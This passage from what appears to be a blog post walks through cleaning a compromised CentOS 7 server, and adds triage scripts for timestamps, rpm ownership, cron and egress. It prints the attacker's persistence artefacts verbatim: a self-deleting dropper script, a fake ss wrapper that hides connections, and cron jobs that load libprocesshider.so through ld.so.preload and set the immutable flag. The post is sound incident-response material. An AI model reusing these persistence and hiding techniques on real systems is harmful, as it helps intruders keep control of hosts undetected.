-rw-r--r-- 1 root root 20 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/init.py
-rw-r--r-- 1 root root 175 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/init.pyc
-rw-r--r-- 1 root root 5.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_childutils.py
-rw-r--r-- 1 root root 8.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_childutils.pyc
-rw-r--r-- 1 root root 540 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_confecho.py
-rw-r--r-- 1 root root 1.4K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_confecho.pyc
-rw-r--r-- 1 root root 27K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_datatypes.py
-rw-r--r-- 1 root root 53K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_datatypes.pyc
-rw-r--r-- 1 root root 48K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_dispatchers.py
-rw-r--r-- 1 root root 51K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_dispatchers.pyc
-rw-r--r-- 1 root root 21K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_events.py
-rw-r--r-- 1 root root 27K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_events.pyc
-rw-r--r-- 1 root root 25K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_http.py
-rw-r--r-- 1 root root 38K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_http.pyc
-rw-r--r-- 1 root root 13K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_loggers.py
-rw-r--r-- 1 root root 20K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_loggers.pyc
-rw-r--r-- 1 root root 130K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_options.py
-rw-r--r-- 1 root root 139K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_options.pyc
-rw-r--r-- 1 root root 17K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_poller.py
-rw-r--r-- 1 root root 23K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_poller.pyc
-rw-r--r-- 1 root root 89K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_process.py
-rw-r--r-- 1 root root 96K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_process.pyc
-rw-r--r-- 1 root root 95K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_rpcinterfaces.py
-rw-r--r-- 1 root root 86K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_rpcinterfaces.pyc
-rw-r--r-- 1 root root 7.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_socket_manager.py
-rw-r--r-- 1 root root 13K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_socket_manager.pyc
-rw-r--r-- 1 root root 2.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_states.py
-rw-r--r-- 1 root root 4.9K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_states.pyc
-rw-r--r-- 1 root root 67K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_supervisorctl.py
-rw-r--r-- 1 root root 94K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_supervisorctl.pyc
-rw-r--r-- 1 root root 23K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_supervisord.py
-rw-r--r-- 1 root root 25K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_supervisord.pyc
-rw-r--r-- 1 root root 6.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_web.py
-rw-r--r-- 1 root root 11K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_web.pyc
-rw-r--r-- 1 root root 34K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_xmlrpc.py
-rw-r--r-- 1 root root 51K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/tests/test_xmlrpc.pyc
-rwxrw-rw- 1 root root 1.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/button_refresh.gif
-rwxrw-rw- 1 root root 1.4K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/button_restart.gif
-rwxrw-rw- 1 root root 1.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/button_stop.gif
-rwxrw-rw- 1 root root 1.7K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/icon.png
-rwxrw-rw- 1 root root 54 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/rule.gif
-rwxrw-rw- 1 root root 1.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/state0.gif
-rwxrw-rw- 1 root root 1.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/state1.gif
-rwxrw-rw- 1 root root 1.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/state2.gif
-rwxrw-rw- 1 root root 1.2K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/state3.gif
-rwxrw-rw- 1 root root 3.1K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/images/supervisor.gif
-rwxrw-rw- 1 root root 2.3K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/status.html
-rwxrw-rw- 1 root root 3.6K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/stylesheets/supervisor.css
-rwxrw-rw- 1 root root 691 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/ui/tail.html
-rwxrw-rw- 1 root root 6 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/version.txt
-rw-r--r-- 1 root root 23K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/web.py
-rw-r--r-- 1 root root 20K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/web.pyc
-rw-r--r-- 1 root root 22K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/xmlrpc.py
-rw-r--r-- 1 root root 23K 10月 14 11:37 /usr/lib/python2.7/site-packages/supervisor-3.3.3-py2.7.egg/supervisor/xmlrpc.pyc
-rwxr-xr-x 1 root root 954K 10月 14 11:37 /usr/sbin/https
-rwxr-xr-x 1 root root 116 10月 14 11:37 /usr/sbin/httpss
-rwxrwxrwx. 1 root root 39 10月 14 11:37 /usr/sbin/ss
-rw-r--r-- 1 root root 284K 10月 14 11:30 /var/log/sa/sa14
-rw-r--r-- 1 root root 1 10月 14 11:38 /var/log/syslog
-rw-rw---- 1 root mail 0 10月 14 11:37 /var/spool/mail/ftp2

Check which package the suspicious files belong to (rpm -qf reports the owning package):
[root@centos7 lib]# rpm -qf /usr/sbin/ss
iproute-3.10.0-87.el7.x86_64
[root@centos7 lib]# rpm -qf /usr/sbin/https
file /usr/sbin/https is not owned by any package
[root@centos7 lib]# rpm -qf /usr/sbin/httpss
file /usr/sbin/httpss is not owned by any package
Ownership only says that the path belongs to iproute; the file sitting there is the 39-byte shell script from the listing above, not the package's binary. rpm -V iproute flags it as modified, and yum -y reinstall iproute restores the real ss.
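The find-by-timestamp and rpm -qf steps above, folded into one script as an added example (not code from the original post). find narrows to executables modified in the 11:37 window; each hit is classified by its first bytes rather than its name (the post found an empty ps and shell scripts where the netstat and ss binaries belong); rpm is asked which package owns it and whether that file still matches the package; and the hits are grouped by content hash, since the same payload under several names is a common tell (https, spts and .funzip in the listing are all 954K). The sample tree is constructed in a temporary directory so the block runs anywhere; on the real host call triage / '2020-10-14 11:00' '2020-10-14 12:00'. It assumes GNU find and coreutils (for -newermt and touch -d) and uses rpm only where it is installed.

```shell
#!/bin/sh
# Added example, not code from the original post: triage of the files written
# in the attacker's time window. Assumes GNU find/coreutils; rpm is optional.
set -u

# Regular files with any execute bit whose mtime is in (start, end]. The post's
# -perm -111 requires all three execute bits; -perm /111 matches any of them.
# /proc and /sys are pseudo-filesystems and are pruned.
find_window() {
    find "$1" \( -path /proc -o -path /sys \) -prune -o \
        -type f -perm /111 -newermt "$2" ! -newermt "$3" -print
}

# Classify by content, not by name: ELF magic is 7f 45 4c 46, scripts start "#!".
classify() {
    if [ ! -s "$1" ]; then echo empty; return 0; fi
    magic=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case "$magic" in
        7f454c46) echo elf ;;
        2321*)    echo script ;;
        *)        echo other ;;
    esac
}

# Owning package, and whether rpm -V still thinks this file matches it. A file
# owned by no package, or owned but reported modified, is a suspect either way.
rpm_owner() {
    command -v rpm >/dev/null 2>&1 || { echo "rpm not available"; return 0; }
    if pkg=$(rpm -qf "$1" 2>/dev/null); then
        if rpm -V "$pkg" 2>/dev/null | grep -q " $1\$"; then
            echo "$pkg (MODIFIED)"
        else
            echo "$pkg (verified)"
        fi
    else
        echo "not owned by any package"
    fi
}

# Read paths on stdin; print one line per group of files with identical content.
dupes_by_hash() {
    while IFS= read -r f; do sha256sum "$f"; done |
    awk '{ n[$1]++; files[$1] = files[$1] " " $2 }
         END { for (h in n) if (n[h] > 1) print substr(h, 1, 12) ":" files[h] }'
}

triage() {
    find_window "$@" | sort | while IFS= read -r f; do
        printf '%-7s %s  [%s]\n' "$(classify "$f")" "$f" "$(rpm_owner "$f")"
    done
    echo "identical content:"
    find_window "$@" | dupes_by_hash
}

# Constructed stand-in for the compromised filesystem: a fake ELF and a copy of
# it under another name, a wrapper script, a gutted empty binary, and an older
# file outside the window. Prints the directory it created.
make_sample_tree() {
    d=$(mktemp -d)
    printf '\177ELF\002\001\001' > "$d/spts"
    cp "$d/spts" "$d/https"
    printf '#!/bin/sh\niss | grep -v 127.0.0.1\n' > "$d/ss"
    : > "$d/ps"
    printf 'plain data\n' > "$d/older"
    chmod 755 "$d"/*
    touch -d '2020-10-14 11:37' "$d/spts" "$d/https" "$d/ss" "$d/ps"
    touch -d '2020-10-13 09:00' "$d/older"
    echo "$d"
}

sample=$(make_sample_tree)
triage "$sample" '2020-10-14 11:00' '2020-10-14 12:00'
rm -rf "$sample"
```

Hashing is the safe way to learn that .funzip, https and spts are one and the same file; executing one of them to see whether the CPU spikes, as the post did, runs the payload again.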

[root@centos7 lib]# cat /usr/sbin/httpss

#!/bin/bash
cd /sbin 2>/dev/null
cp -f -- https .sh 2>/dev/null
./.sh -c  >/dev/null 2>&1
rm -rf -- .sh 2>/dev/null
The script copies https to a hidden file named .sh, runs it with -c, then deletes the copy, so the running process is left with no file on disk to point at. Cunning!

rm -f /usr/sbin/https
rm -f /usr/sbin/httpss

Also check whether /usr/sbin/httpss is invoked from cron.

/usr/sbin/ss turned out to be a shell script wrapping the iss executable:

#!/bin/sh
iss|grep -v "127.0.0.1"
exit

Looking into iss: it has no man page, so iss is another planted file. The wrapper filters out every line containing 127.0.0.1, hiding any loopback connection from whoever runs ss.

/usr/bin/nets is the real executable
/usr/bin/netstat is a shell script wrapping nets, the same trick as with ss

/usr/bin/.bget prints wget's help when run with -help; it is actually wget
/usr/bin/dget is likewise wget
/usr/bin/dpkgd/ls
/usr/bin/dpkgd/ne
/usr/bin/dpkgd/ps
/usr/bin/dpkgd/ss
(the listing above shows the full set under /usr/bin/dpkgd: lsof, netstat, ps and ss, the attacker's private copies of the very tools it replaced)

/usr/bin/.funzip sent CPU usage through the roof the moment it was run, so it must be the payload; recommended: rm -f /usr/bin/.funzip. Running an unknown binary on the compromised host to see what it does is a risky way to identify it: file, strings and sha256sum are safer, and the hash comparison is worth doing, since /usr/bin/.funzip, /usr/sbin/https and /etc/spts are all 954K in the listing.

Contents of /etc/crontab:

SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/1 * * * * root  cp -f -r -- /etc/.sh /tmp/.sh 2>/dev/null && /tmp/.sh -c  >/dev/null 2>&1 && rm -rf -- /tmp/.sh 2>/dev/null
* * * * * root  echo /usr/local/lib/libprocesshider.so > /etc/ld.so.preload && lockr +i /etc/ld.so.preload >/dev/null 2>&1
0 */4 * * * root /etc/profile.d/php.sh
*/3 * * * * root /etc/sphp >/dev/null 2>&1

lsattr /etc/crontab
chattr -ai /etc/crontab
Comment out the four entries above. Also check /var/spool/cron/*, /etc/cron.d/ and the cron.hourly/daily/weekly/monthly directories, plus systemctl list-timers --all; and note that the two /etc/profile.d scripts below are sourced by every login shell, so they re-launch the malware whenever anyone logs in.
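A heuristic scan of crontab entries, added as an example (not from the original post). Each job is checked for the tells visible in the crontab above: an every-minute schedule, a hidden "/." path, staging through /tmp, touching ld.so.preload, setting +i, and silencing all output; matching jobs are printed with the reasons. The sample crontab is constructed from the post's four entries plus one legitimate logrotate job. Heuristics only triage: the 0 */4 php.sh entry trips none of them and is malicious all the same, so every job's target still has to be read. cron_sources lists the other places cron reads jobs from on CentOS 7; per-user tables under /var/spool/cron have no user field, so the command starts at field 6 there.

```shell
#!/bin/sh
# Added example, not code from the original post: heuristic scan of cron jobs.
set -u

# Input: crontab lines on stdin. The optional argument is the field where the
# command starts: 7 for /etc/crontab and /etc/cron.d (user field present),
# 6 for per-user tables. Output: "reasons<TAB>line" per job that trips a check.
scan_crontab() {
    awk -v start="${1:-7}" '
        /^[ \t]*(#|$)/  { next }        # comment or blank
        /^[A-Za-z_]+=/  { next }        # SHELL=, PATH=, MAILTO=
        {
            cmd = $start
            for (i = start + 1; i <= NF; i++) cmd = cmd " " $i
            r = ""
            if ($1 == "*" || $1 == "*/1")             r = r "every-minute,"
            if (cmd ~ "/[.][^/ ]")                    r = r "hidden-path,"
            if (cmd ~ "/tmp/")                        r = r "tmp-staging,"
            if (cmd ~ "ld[.]so[.]preload")            r = r "ld-preload,"
            if (cmd ~ "[+]i ")                        r = r "chattr-immutable,"
            if (cmd ~ "2>&1" && cmd ~ "/dev/null")    r = r "silenced,"
            if (r != "") { sub(/,$/, "", r); print r "\t" $0 }
        }'
}

# Every place cron picks jobs up from on CentOS 7 (the post only looked at
# /etc/crontab). Per-user tables under /var/spool/cron need root to read.
cron_sources() {
    for p in /etc/crontab /etc/cron.d/* /etc/cron.hourly/* /etc/cron.daily/* \
             /etc/cron.weekly/* /etc/cron.monthly/* /var/spool/cron/*; do
        if [ -f "$p" ]; then echo "$p"; fi
    done
    return 0
}

# Constructed sample: the post's four jobs plus one legitimate logrotate job.
SAMPLE_CRONTAB='SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# m h dom mon dow user command
0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf
*/1 * * * * root  cp -f -r -- /etc/.sh /tmp/.sh 2>/dev/null && /tmp/.sh -c  >/dev/null 2>&1 && rm -rf -- /tmp/.sh 2>/dev/null
* * * * * root  echo /usr/local/lib/libprocesshider.so > /etc/ld.so.preload && lockr +i /etc/ld.so.preload >/dev/null 2>&1
0 */4 * * * root /etc/profile.d/php.sh
*/3 * * * * root /etc/sphp >/dev/null 2>&1'

printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab
echo "cron sources present on this host:"
cron_sources
```

On the real host: `scan_crontab < /etc/crontab`, `cat /etc/cron.d/* | scan_crontab`, and `scan_crontab 6 < /var/spool/cron/root`. Run it before commenting anything out, and again afterwards, since the every-minute job rewrote its own tables.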

/etc/profile.d/php.sh (kills the previous instance recorded in /etc/.qucfu.pid, copies /bin/shh to /bin/.sh and runs it):

#!/bin/bash
cat /etc/.qucfu.pid | xargs -I % kill -9 % >/dev/null 2>&1
sleep 0.5
cp -f -r -- /bin/shh /bin/.sh 2>/dev/null
sleep 0.5
/bin/.sh -c  >/dev/null 2>&1
rm -rf -- .sh 2>/dev/null

/etc/profile.d/supervisor.sh (starts supervisord from the hidden /etc/.supervisor config, which is what the supervisor egg in the listing was installed for):

#!/bin/bash
supervisord -c /etc/.supervisor/supervisord.conf >/dev/null 2>&1
supervisorctl reload >/dev/null 2>&1

Check the boot-time startup entries in /etc/rc.d/rc.local or /etc/rc.local as well.

which ps
file /usr/bin/ps reported an empty file. Damn, they didn't even bother with a wrapper: ps itself was gutted. (ps belongs to procps-ng on CentOS 7; yum -y reinstall procps-ng restores it. Likewise net-tools for netstat, iproute for ss and lsof for lsof.)

How to find files in an exact time window with find: https://blog.csdn.net/weixin_33763244/article/details/91820306

This compromise relied on a preloaded shared library; see "警惕利用Linux预加载型恶意动态链接库的后门" (Beware of Linux backdoors built on preloaded malicious dynamic libraries):
https://www.freebuf.com/column/162604.html

Undeletable files on Linux: hidden attributes (the lsattr and chattr commands)
https://blog.csdn.net/qq_37212828/article/details/102810514
Flags:
a: append only, the file can only be opened for appending;
A: do not update the access time;
c: store compressed on disk;
d: exclude from dump backups;
i: immutable, the file cannot be modified, deleted, renamed or linked to, even by root, until the flag is cleared;
s: secure deletion, blocks are zeroed when the file is removed;
S: synchronous updates, writes go straight to disk;
u: undeletable, contents are kept so the file can be recovered

Limiting the CPU a process can use: yum install cpulimit, then cpulimit -p 2626 -l 0.1 (reference: http://www.ttlsa.com/tools/cpulimit-limit-cpu-usage-on-linux/)
In practice it has to stay running in the background: nohup cpulimit -p 2626 -l 0.1 &
Suspicious processes: .sh and longbak
Network connections by process id: lsof -p 2626, or lsof -p 2626 -n to skip the reverse DNS lookups
That showed the .sh process constantly reaching out to the network. Use lsof to collect the outbound destinations and drop every one of them: iptables -I OUTPUT -d xxx.xx.xx.xx -j DROP (the target name is case-sensitive, so drop in lower case is rejected). Collect all the IPs and drop them all, and don't forget to save the rules at the end.
The connections went to a tproxy port (searching online points at 8081). Pressing c in top shows the full program path.
Saving the iptables rules: this host runs firewalld (see the firewall-cmd rules at the top), which rebuilds the iptables chains on every firewall-cmd --reload, so rules inserted with bare iptables do not survive a reload, and service iptables save needs the iptables-services package, which is not meant to run alongside firewalld. On CentOS 7 the persistent form is firewall-cmd --permanent --direct --add-rule ipv4 filter OUTPUT 0 -d xxx.xx.xx.xx -j DROP followed by firewall-cmd --reload.
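The lsof-to-firewall step, as an added example (not code from the original post): it extracts the remote peers from lsof -nP -i output, keeps those belonging to the named suspect processes, and prints firewalld direct rules that drop outbound traffic to them. The lsof lines are constructed (process names and port 8081 follow the post; the addresses are documentation ranges). Nothing is applied: review the printed commands, then run them as root. Direct rules are used because firewalld rebuilds the iptables chains on every reload, discarding rules inserted with bare iptables.

```shell
#!/bin/sh
# Added example, not code from the original post: outbound peers from lsof,
# turned into firewalld direct rules. Sample lsof output is constructed.
set -u

# "command pid remote-ip remote-port" for each lsof line with a connected peer,
# i.e. a NAME of the form local:port->remote:port. Listeners have no "->".
remote_endpoints() {
    awk 'match($0, "->[0-9.]+:[0-9]+") {
             peer = substr($0, RSTART + 2, RLENGTH - 2)
             split(peer, a, ":")
             print $1, $2, a[1], a[2]
         }'
}

# Unique remote IPs contacted by the named processes (exact command names),
# so the admin's own sshd session is never swept up with the malware's peers.
peers_of() {
    awk -v names="$*" '
        BEGIN { n = split(names, a, " "); for (i = 1; i <= n; i++) want[a[i]] = 1 }
        ($1 in want) { print $3 }' | sort -u
}

# firewalld owns the iptables chains on CentOS 7 and rebuilds them on
# `firewall-cmd --reload`, which throws away rules added with bare iptables.
# A permanent direct rule in OUTPUT survives reloads and reboots.
egress_drop_rule() {
    printf 'firewall-cmd --permanent --direct --add-rule ipv4 filter OUTPUT 0 -d %s -j DROP\n' "$1"
}

# Constructed `lsof -nP -i` output: the two suspect processes from the post,
# two legitimate listeners, and the admin's own ssh session.
SAMPLE_LSOF='COMMAND   PID   USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
.sh      2626   root    5u  IPv4  40321      0t0  TCP 10.0.0.5:43210->203.0.113.7:8081 (ESTABLISHED)
.sh      2626   root    6u  IPv4  40322      0t0  TCP 10.0.0.5:43211->203.0.113.7:8081 (ESTABLISHED)
longbak  2701   root    3u  IPv4  40400      0t0  TCP 10.0.0.5:51000->198.51.100.23:443 (ESTABLISHED)
mysqld   1180  mysql   21u  IPv4  21000      0t0  TCP 127.0.0.1:3306 (LISTEN)
httpd    1300 apache    4u  IPv6  22000      0t0  TCP *:80 (LISTEN)
sshd     3100   root    3u  IPv4  50000      0t0  TCP 10.0.0.5:22->192.0.2.10:55000 (ESTABLISHED)'

echo "# remote endpoints:"
printf '%s\n' "$SAMPLE_LSOF" | remote_endpoints
echo "# rules for the suspect processes:"
printf '%s\n' "$SAMPLE_LSOF" | remote_endpoints | peers_of .sh longbak |
while read -r ip; do egress_drop_rule "$ip"; done
echo 'firewall-cmd --reload'
```

On the live host feed it `lsof -nP -i | remote_endpoints | peers_of .sh longbak`, and remember that blocking the peers only buys time: the every-minute cron job and the profile.d scripts keep restarting the client, and the binaries can carry more than one destination.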

/bin/.sh and /usr/bin/.sh kept reappearing. Create both yourself as empty files and chattr +i them so the malware can no longer copy its payload into them.

References: https://www.jb51.net/article/167765.htm
https://blog.csdn.net/charliemunger/article/details/103610648

How could a single process's network access be restricted through /proc/pid/net??? (/proc/PID/net is a read-only view of the sockets in the process's network namespace, not a control point. Per-process egress control needs either an iptables owner match, which keys on uid/gid only and so does nothing against malware running as root, or a separate network namespace. Realistically, once ps, netstat and ss have been replaced and an ld.so.preload rootkit is in place, nothing the host reports about itself can be trusted; collect the evidence and rebuild it from known-good media.)

posted @ 2020-10-20 13:25 helloweifa